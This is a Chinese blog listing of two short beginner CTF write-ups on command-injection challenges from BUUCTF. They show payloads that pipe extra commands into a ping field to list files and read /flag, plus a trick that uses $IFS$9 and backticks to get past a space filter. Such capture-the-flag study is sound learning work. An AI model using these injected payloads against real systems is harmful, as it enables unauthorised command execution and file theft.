命令注入
aoao今晚吃什么
新手CTFer
展开
-
【BUUCTF】[ACTF2020 新生赛]Exec1
题目网站是一个可以ping各种地址的小程序,返回的应该是命令执行结果 于是想到注入其他命令 127.0.0.1 | ls 接着查看根目录 127.0.0.1 | ls / 看见flag,最后打开它即可 127.0.0.1 | cat /flag ...原创 2022-02-15 11:15:15 · 3307 阅读 · 0 评论 -
【BUUCTF】[GXYCTF2019]Ping Ping Ping1
很明显是一道命令注入的题目 尝试ls查看 注意空格被过滤 Linux空格绕过 $IFS$9 构造payload ?ip=127.0.0.1|cat$IFS$9`ls` 注意`ls`是作为命令被执行,具有同样作用的还有$() 在网页源代码中可以看见flag ...原创 2022-02-15 21:25:27 · 1458 阅读 · 0 评论